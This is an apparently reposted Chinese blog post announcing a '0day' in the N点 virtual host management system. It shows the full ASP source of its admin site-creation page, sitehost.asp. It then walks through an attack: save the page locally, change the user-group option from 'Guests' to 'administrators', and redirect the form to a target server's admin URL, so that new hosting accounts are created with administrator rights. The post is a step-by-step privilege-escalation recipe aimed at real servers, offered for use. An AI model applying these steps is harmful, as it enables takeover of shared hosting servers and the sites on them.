N点虚拟主机管理系统 致命漏洞通杀所有版本(0day)

这个漏洞本人 发现 已经很长时间了 由于时间比较忙一直没有发布。。
因为涉及服务器 比较多我就不发布怎么 得到后台PSW了。。。。
首先先分析下sitehost.asp他致命漏洞所在的页面
看红色部位

 
<!--#include file="sessioncolck.asp" -->
<!--#include file="pagesession/CS1.asp" -->
<!--#include file="../inc/conn.asp" -->
<!--#include file="../inc/char.asp" -->
<!--#include file="../inc/function.asp" -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Powered By npoint</title>
<link href="../css/style.css" rel="stylesheet" type="text/css" />
<script src=\'#\'" /js/ajax_x.js" type="text/javascript"></script>
<script src=\'#\'" /js/alt.js" type="text/javascript"></script>
</head>
<body>
<%
rs.open "Select * from hostcs",conn,1,1
ftpsoft=rs("ftpsoft")  'FTP软件
hostdomain=rs("hostdomain") '赠送域名
diskpe=rs("diskpe") '磁盘配额
ftpid=rs("ftpid") 'IISFTP标识符
doc=rs("doc") '默认文档
servupath=rs("servupath")  'Serv-u/Gene6 安装路径
servuid=rs("servuid")     'Serv-U 7.X ID号
servudomain=rs("servudomain") 'Serv-u7.x/Gene6 域名称
webpage=rs("webpage") '开设欢迎页
appsitenum=rs("appsitenum") '超过多少网站 自动创建程序池
yncreateapploop=rs("yncreateapploop") '是否自动创建程序池
dcapppool=rs("dcapppool") '当前自动创建完的程序池
appbtitle=rs("appbtitle") '自动创建程序池标头
rs.close
set iishost=server.createobject("npoint.host") '加载组件
if request.QueryString("action")="kshost" then
'叛断输入的域名是否合法或有带WWW
if trim(request.form("domain"))<>"" then
   if ubound(split(trim(request.form("domain")),"."))<1 then
   call ErrMsgBox("操作失败.\n\n1.绑定的域名不合法,请更换")
   response.End()
   else
     if LCase(split(trim(request.form("domain")),".")(0))="www" then
  call ErrMsgBox("操作失败.\n\n1.绑定的域名不包括www,请更换")
     response.End()
  end if
   end if
end if
'叛断FTP账号是否合法
chkftp=chk_ftpuser(trim(request.form("FTPuser")))
if chkftp<>"1" then
call ErrMsgBox(chkftp)
response.End()
end if
'叛断域名是否存在
if trim(request.form("domain"))<>"" then
rs.open "Select host_domain,todomain from sitehost",conn,1,1
if rs.bof and rs.eof then
rs.close
else
for i=1 to rs.recordcount
if rs("host_domain")="" then
H_D=""
else
H_D=rs("host_domain") & "|"
end if
if rs("todomain")="" then
T_D=""
else
T_D=rs("todomain") & "|"
end if
All_domain=All_domain & H_D & T_D
rs.movenext
next
rs.close
if All_domain<>"" then
Fall_domain=split(mid(All_domain,1,len(All_domain)-1),"|")
for s=0 to ubound(Fall_domain)
if Fall_domain(s)=trim(request.form("domain")) or Fall_domain(s)="www."&trim(request.form("domain")) then
call ErrMsgBox("操作失败.\n\n1.绑定域名已存在,请更换.")
response.End()
end if
next
end if
end if
end if
'叛断FTP账号是否存在
rs.open "Select FTPuser from sitehost where FTPuser='"&trim(request.form("FTPuser"))&"'",conn,1,1
if rs.bof and rs.eof then
rs.close
'设置站点标识符ID号
rs.open "Select * from sitehost order by id desc",conn,1,1
if rs.bof and rs.eof then
ifid=2  '站点标识符
else
ifid=rs("ID")+1
end if
rs.close
'计算到期时间
sdate=date() '开设时间
if ubound(split(sdate,"-"))>1 then
d_fgh="-"
elseif ubound(split(sdate,"/"))>1 then
d_fgh="/"
elseif ubound(split(sdate,"."))>1 then
d_fgh="."
end if
Fjdate=split(sdate,d_fgh)
Tyear=int(Fjdate(0))+int(request.form("Eyear"))
Tmone=int(Fjdate(1))+int(request.form("Emone"))
if int(Fjdate(2))=31 then
dayx=int(Fjdate(2))-1
else
dayx=int(Fjdate(2))
end if
if Tmone>12 then
  if Tmone-12=2 and dayx=29 then
Edate=Tyear+1 & d_fgh & Tmone-12 & d_fgh & "28" '到期时间
  else
Edate=Tyear+1 & d_fgh & Tmone-12 & d_fgh & dayx '到期时间  
  end if
else
   if Tmone=2 and dayx=29 then
Edate=Tyear & d_fgh & Tmone & d_fgh & "28" '到期时间
   else
Edate=Tyear & d_fgh & Tmone & d_fgh & dayx '到期时间
   end if
end if
'自动创建程序池或独立程序池
 if yncreateapploop=1 then
   if request.Form("autocreateapp")=0 then
        Appstate=iishost.appstateyn(appbtitle&"_"&dcapppool)'叛断进程池是否存在 1为存在   0为不存在
  if Appstate=1 then
   uidapple=appbtitle&"_"&dcapppool
         rs.open "Select apppool from sitehost where RID=1 and apppool='"&uidapple&"'",conn,1,1
         if rs.bof and rs.eof then
   rs.close
   iisapppool_B=uidapple
   else
     if int(rs.recordcount)>int(appsitenum-1) then
        R=iishost.creatiisapp(appbtitle&"_"&dcapppool+1, "", "", "",1,"","")
     if R=1 then
     rs.close
     conn.Execute("Update hostcs Set dcapppool='"&dcapppool+1&"'")
     iisapppool_B=appbtitle&"_"&dcapppool+1
     else
      rs.close
       rs.open "Select * from errorlist where errora='"&R&"'",conn,1,1
                   if rs.bof and rs.eof then
                   call SucBox("操作失败.\n\n错误代码:"&R,"sitehost.asp")
                   else
                   call SucBox("操作失败.\n\n错误代码:"&R&"\n\n错误提示:"&rs("errorlist"),"sitehost.asp")
                   end if
                   rs.close
       response.End()
     end if
     else
     iisapppool_B=uidapple
     end if
   end if
     elseif Appstate=0 then
  R=iishost.creatiisapp(appbtitle&"_"&dcapppool, "", "", "",1,"","")
   if R=1 then
     iisapppool_B=appbtitle&"_"&dcapppool
     else
     rs.open "Select * from errorlist where errora='"&R&"'",conn,1,1
           if rs.bof and rs.eof then
           call SucBox("操作失败.\n\n错误代码:"&R,"sitehost.asp")
           else
           call SucBox("操作失败.\n\n错误代码:"&R&"\n\n错误提示:"&rs("errorlist"),"sitehost.asp")
           end if
           rs.close
     response.End()
     end if
  end if
   elseif request.Form("autocreateapp")=1 then
   R=iishost.creatiisapp(""&trim(request.form("FTPuser"))&"", "", "", "",1,"","")
      if R=1 then
    iisapppool_B=trim(request.form("FTPuser"))
   else
    rs.open "Select * from errorlist where errora='"&R&"'",conn,1,1
       if rs.bof and rs.eof then
       call SucBox("操作失败.\n\n错误代码:"&R,"sitehost.asp")
       else
       call SucBox("操作失败.\n\n错误代码:"&R&"\n\n错误提示:"&rs("errorlist"),"sitehost.asp")
       end if
       rs.close
     response.End()
   end if
   end if
 elseif yncreateapploop=0 then
   iisapppool_B=trim(request.form("apppool"))
 end if
'开设主机
R=iishost.createsite(ifid,ftpid,trim(request.form("FTPuser")),trim(request.form("FTPpass")),trim(request.form("domain")),hostdomain,doc,trim(request.form("IISnum")),trim(request.form("MAxnum")),trim(request.form("spanum")),trim(request.form("sitepath")),iisapppool_B,"","","",trim(request.form("rznum")),ftpsoft,servupath,trim(request.form("csnum")),servuid,servudomain,trim(request.form("userGroup")),diskpe,webpage)
if int(R)>1 then
todomain=""
if trim(request.form("domain"))<>"" then
host_domain=trim(request.form("domain"))&"|www."&trim(request.form("domain"))
else
host_domain=""
end if
'添加主机记录
ftppassword=iishost.Eduserpassword(trim(request.form("FTPpass")),1) '加密FTP密码
if yncreateapploop=1 then
conn.Execute("insert into sitehost(RID,Ifid,FTPuser,FTPpass,fupath,host_domain,todomain,sitedoc,spanum,IISnum,MAxnum,tfordnum,sitepath,

apppool,rznum,csnum,userGroup,Azip,Azipnum,Xzip,Xzipnum,sitestate,Sdate,Edate,appdlnum,appautocreat) values(1,'"&R&"','"&trim(request.form("FTPuser"))&"','"&ftppassword&"',1,'"&host_domain&"','"&todomain&"','"&doc&"',"&trim(request.form("spanum"))&","&trim(request.form("IISnum"))&","&trim(request.form("MAxnum"))&","&trim(request.form("tfordnum"))&",'"&trim(request.form("sitepath"))&"','"&iisapppool_B&"',"&trim(request.form("rznum"))&","&trim(request.form("csnum"))&",'"&trim(request.form("userGroup"))&"',"&trim(request.form("Azip"))&","&trim(request.form("Azipnum"))&","&trim(request.form("Xzip"))&","&trim(request.form("Xzipnum"))&",1,'"&sdate&"','"&Edate&"',"&trim(request.Form("autocreateapp"))&","&yncreateapploop&")")
else
conn.Execute("insert into sitehost(RID,Ifid,FTPuser,FTPpass,fupath,host_domain,todomain,sitedoc,spanum,IISnum,MAxnum,tfordnum,sitepath,

apppool,rznum,csnum,userGroup,Azip,Azipnum,Xzip,Xzipnum,sitestate,Sdate,Edate,appdlnum,appautocreat) values(1,'"&R&"','"&trim(request.form("FTPuser"))&"','"&ftppassword&"',1,'"&host_domain&"','"&todomain&"','"&doc&"',"&trim(request.form("spanum"))&","&trim(request.form("IISnum"))&","&trim(request.form("MAxnum"))&","&trim(request.form("tfordnum"))&",'"&trim(request.form("sitepath"))&"','"&iisapppool_B&"',"&trim(request.form("rznum"))&","&trim(request.form("csnum"))&",'"&trim(request.form("userGroup"))&"',"&trim(request.form("Azip"))&","&trim(request.form("Azipnum"))&","&trim(request.form("Xzip"))&","&trim(request.form("Xzipnum"))&",1,'"&sdate&"','"&Edate&"',0,"&yncreateapploop&")")
end if
'更新站点数量
conn.Execute("Update sitepath Set sitenum=sitenum+1 Where sitepath='"&trim(request.form("sitepath"))&"\"&"'")
call SucBox("操作成功.","adminsitehost.asp")
else
  if yncreateapploop=1 and trim(request.Form("autocreateapp"))=1 then
  X=iishost.deliisapp(""&trim(request.form("FTPuser"))&"")  '发生错误 - 删除独立程序池
  end if
rs.open "Select * from errorlist where errora='"&R&"'",conn,1,1
if rs.bof and rs.eof then
call SucBox("操作失败.\n\n错误代码:"&R,"sitehost.asp")
else
call SucBox("操作失败.\n\n错误代码:"&R&"\n\n错误提示:"&rs("errorlist"),"sitehost.asp")
end if
rs.close
end if
else
rs.close
call ErrMsgBox("操作失败.\n\n1.FTP账号已存在,请更换.")
end if
end if
%><table width="100%" border="0" cellpadding="0" cellspacing="1" class="site_bg_site">
  <tr>
    <td width="100%" height="28" align="left" class="site_top_bg" scope="col"> ·站点虚拟主机开设</td>
  </tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="1" class="site_bg_site">
<script language="JavaScript" type="text/javascript">
function len(s) {
var l = 0;
var a = s.split("");
for (var i=0;i<a.length;i++) {
if (a[i].charCodeAt(0)<299) {
l++;
} else {
l+=2;
}
}
return l;
}
function checkform(theForm){
 if (theForm.FTPuser.value=="") {
    window.alert("请输入FTP账号");
  theForm.FTPuser.focus();
    return false;
 }
 if (len(theForm.FTPuser.value)<3) {
      window.alert("FTP账号必须为3-20位的字符");
      theForm.FTPuser.focus();
      return false;
 }
 if (theForm.FTPpass.value=="") {
      window.alert("请输入FTP密码");
      theForm.FTPpass.focus();
      return false;
 }
 if (len(theForm.FTPpass.value)<6) {
      window.alert("FTP密码必须为6-20位的字符");
      theForm.FTPpass.focus();
      return false;
 }
 if (theForm.toFTPpass.value=="") {
      window.alert("请输入FTP确认密码");
      theForm.toFTPpass.focus();
      return false;
 }
  if (theForm.toFTPpass.value!=theForm.FTPpass.value) {
      window.alert("两次FTP密码不一致");
      theForm.toFTPpass.focus();
      return false;
 }
  if (theForm.spanum.value=="") {
      window.alert("请输入空间大小");
      theForm.spanum.focus();
      return false;
 }
   if (theForm.IISnum.value=="") {
      window.alert("请输入IIS连接数");
      theForm.IISnum.focus();
      return false;
 }
   if (theForm.MAxnum.value=="") {
      window.alert("请输入带宽限制");
      theForm.MAxnum.focus();
      return false;
 }
   if (theForm.tfordnum.value=="") {
      window.alert("请输入子目录绑定个数");
      theForm.tfordnum.focus();
      return false;
 }
   if (theForm.sitepath.value=="") {
      window.alert("请选择存放路径");
      theForm.sitepath.focus();
      return false;
 }
 <%if yncreateapploop=0 then %>
   if (theForm.apppool.value=="") {
      window.alert("请选择应用程序池");
      theForm.apppool.focus();
      return false;
 }
 <%end if%>
   if (theForm.Azipnum.value=="") {
      window.alert("请选择可解压大小");
      theForm.Azipnum.focus();
      return false;
 }
   if (theForm.Xzipnum.value=="") {
      window.alert("请选择可压缩大小");
      theForm.Xzipnum.focus();
      return false;
 }
 sAlert('正在开设虚拟主机...请稍等!');
 theForm.button.disabled=true;
 return true;
 }
 function exchange_App()
 {
  if (document.form1.autocreateapp.value =='0')
  {
   apppool_S.innerHTML ="由系统自动选择  每 <%=appsitenum%> 个站 自动创建 一个应用程序池";
  }
  if(document.form1.autocreateapp.value =='1')
  {
   apppool_S.innerHTML ="使用FTP账号创建一个独立应用程序池";
   }
 }
</script>
<form action="?action=kshost" method="post" id="from1" name="form1" onSubmit="return checkform(this)">
  <tr>
    <td width="13%" height="22" class="site_bg_bs" scope="col">  域名绑定:<A href="http://www.</td">WWW.</td>
    <td width="87%" class="site_bg_bs" scope="col"><input name="domain" type="text" class="input_to_to" id="domain" size="30" title="请输入域名(可留空) 如:npointhost.com(不包含www) ">
       <span class="syt_1">可留空 如:</span>npointhost.com</td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  FTP账号:</td>
    <td class="site_bg_bs" scope="col"><input name="FTPuser" type="text" class="input_to_to" id="FTPuser" size="30" maxlength="20" title="请输入FTP账号(必填)">
       <span class="syt_1">* 请输入3-20位的字符</span></td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  FTP密码:</td>
    <td class="site_bg_bs" scope="col"><input name="FTPpass" type="password" class="input_to_to" id="FTPpass" size="30" maxlength="20" title="请输入FTP密码(必填)">
       <span class="syt_1">* 请输入6-20位的字符</span></td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  FTP确认密码:</td>
    <td class="site_bg_bs" scope="col"><input name="toFTPpass" type="password" class="input_to_to" id="toFTPpass" size="30" maxlength="20"></td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  空间大小:</td>
    <td class="site_bg_bs" scope="col"><input name="spanum" type="text" class="input_to_to" id="spanum" title="请输入空间大小(必填) 如: 100" onKeyUp="value=value.replace(/[^0-9,]/g,'')" size="5" maxlength="9" />
      M    <span class="syt_1">必须0-9的数字</span></td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  IIS连接数:</td>
    <td class="site_bg_bs" scope="col"><input name="IISnum" type="text" class="input_to_to" id="IISnum" title="请输入IIS连接数(必填) 如: 100" onKeyUp="value=value.replace(/[^0-9,]/g,'')" size="5" maxlength="9" />
      个        <span class="syt_1">必须0-9的数字    0</span>为不限制连接数</td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  带宽限制:</td>
    <td class="site_bg_bs" scope="col"><input name="MAxnum" type="text" class="input_to_to" id="MAxnum" title="请输入带宽限制(必填) 如: 1024" onKeyUp="value=value.replace(/[^0-9,]/g,'')" size="5" maxlength="9">
      KB/秒   <span class="syt_1">必须0-9的数字    0</span>为不限制带宽</td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  子目录绑定:</td>
    <td class="site_bg_bs" scope="col"><input name="tfordnum" type="text" class="input_to_to" id="tfordnum" title="请输入子目录绑定个数 如: 2" onKeyUp="value=value.replace(/[^0-9,]/g,'')" size="5" maxlength="9">
      个   <span class="syt_1">必须0-9的数字    0</span>为禁止使用</td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  存放路径:</td>
    <td class="site_bg_bs" scope="col"><select name="sitepath" class="input_to_to" id="sitepath" title="请选择存放路径(必选)">
      <option>请选择存放路径</option>
      <%rs.open "Select * from sitepath where pathclass=1 and pathyn=1",conn,1,1
   if rs.bof and rs.eof then
   else
   do while not rs.eof
   %>
      <option value="<%=mid(rs("sitepath"),1,len(rs("sitepath"))-1)%>"><%=rs("sitepath")%></option>
      <%
   rs.movenext
   loop
   end if
   rs.close
   %>
    </select></td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  应用程序池:</td>
    <td class="site_bg_bs" scope="col"><%
    if yncreateapploop=0 then%><select name="apppool" class="input_to_to" id="apppool">
    <option>请选择应用程序池</option>
          <%
  R=iishost.listapppool()
  listname=split(R,";")
  listappnum=ubound(listname)
  if listappnum<>0 then
  for i=1 to listappnum
    relist=split(listname(i),",")
   %>
          <option value="<%=relist(0) %>"><%=relist(0) %></option>
      <% next
   end if%></select><%elseif yncreateapploop=1 then
   %><select name="autocreateapp" class="input_to_to" id="autocreateapp" onChange="javascript:exchange_App()">
        <option value="0" selected>系统自动选择</option>
        <option value="1">使用独立程序池</option>
      </select>
       <span id="apppool_S">由系统自动选择  每 <%=appsitenum%> 个站 自动创建 一个应用程序池</span><%end if%></td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  日志记录:</td>
    <td class="site_bg_bs" scope="col"><select name="rznum" class="input_to_to" id="rznum">
      <option value="0">禁用</option>
      <option value="1">启用</option>
    </select></td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  用户权限:</td>
    <td class="site_bg_bs" scope="col"><input type="radio" name="csnum" id="radio" value="1"><span class="syt_1">读取</span> | <input type="radio" name="csnum" id="radio2" value="2"><span class="syt_1">读取/写入</span> | <input name="csnum" type="radio" id="radio3" value="3" checked><span class="syt_1">读取/写入/删除</span> | <input type="radio" name="csnum" id="radio4" value="4"><span class="syt_1">读取/写入/删除/运行</span></td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  用户组:</td>
    <td class="site_bg_bs" scope="col"><select name="userGroup" class="input_to_to" id="userGroup">
      <option value="" selected>无用户组</option>
      <option value="Guests">Guests</option>
    </select></td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  在线解压:</td>
    <td class="site_bg_bs" scope="col"><select name="Azip" class="input_to_to" id="Azip">
      <option value="0">禁用</option>
      <option value="1">启用</option>
    </select>      <input name="Azipnum" type="text" class="input_to_to" id="Azipnum" onKeyUp="value=value.replace(/[^0-9,]/g,'')" value="10" size="5" maxlength="9">
    M   <span class="syt_1">0 </span>为不限制大小</td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  在线压缩:</td>
    <td class="site_bg_bs" scope="col"><select name="Xzip" class="input_to_to" id="Xzip">
      <option value="0">禁用</option>
      <option value="1">启用</option>
    </select>
      <input name="Xzipnum" type="text" class="input_to_to" id="Xzipnum" onKeyUp="value=value.replace(/[^0-9,]/g,'')" value="10" size="5" maxlength="9">
M   <span class="syt_1">0 </span>为不限制大小</td>
  </tr>
  <tr>
    <td height="22" class="site_bg_bs" scope="col">  主机期限:</td>
    <td class="site_bg_bs" scope="col"><select name="Eyear" class="input_to_to" id="Eyear">
        <option value="0">0年</option>
        <option value="1" selected>1年</option>
        <option value="2">2年</option>
        <option value="3">3年</option>
        <option value="4">4年</option>
        <option value="5">5年</option>
        <option value="6">6年</option>
        <option value="7">7年</option>
        <option value="8">8年</option>
        <option value="9">9年</option>
        <option value="10">10年</option>
        </select>
     
      <select name="Emone" class="input_to_to" id="Emone">
      <option value="0">0个月</option>
      <option value="1">1个月</option>
      <option value="2">2个月</option>
      <option value="3">3个月</option>
      <option value="4">4个月</option>
      <option value="5">5个月</option>
      <option value="6">6个月</option>
      <option value="7">7个月</option>
      <option value="8">8个月</option>
      <option value="9">9个月</option>
      <option value="10">10个月</option>
      <option value="11">11个月</option>
      </select></td>
  </tr>
  <tr>
    <td height="28" colspan="2" align="center" class="site_bg_bs" scope="col"><input name="button" type="submit" class="button_butt" id="button" value="开设主机"></td>
  </tr>
  </form>
</table>
</body>
</html>
 

以上代码 431行<option value="Guests">Guests</option> 致命代码

看到以上分析大家明白了吗? 不明白没问题 继续分解。。。

等到管理密码   直接 进入 开空间 也就 http://www.***.com/admin/sitehost.asp

现在大家 先别急 右键 查看代码 将代码保存 到 本地 或直接另存为

保存到 本地后 进行代码修改 。Ctrl +F 进行查找 <option value="Guests">Guests</option>

<option value="Guests">Guests</option>Guests 修改为 administrators

<option value="administrators">administrators</option>

看到现在了,明白了吧? 继续

然后 Ctrl + F 查找 <form action="?action=kshost" method="post" id="from1" name="form1" onSubmit="return checkform(this)">
修改为 <form action="http://www.xxx.com/admin/sitehost.asp?action=kshost" method="post" id="from1" name="form1" onSubmit="return checkform(this)">
网上大把的了。。

N点虚拟主机管理系统 致命漏洞通杀所有版本(0day)_第1张图片
 

你可能感兴趣的:(虚拟主机,管理系统,N点,通杀,致命漏洞)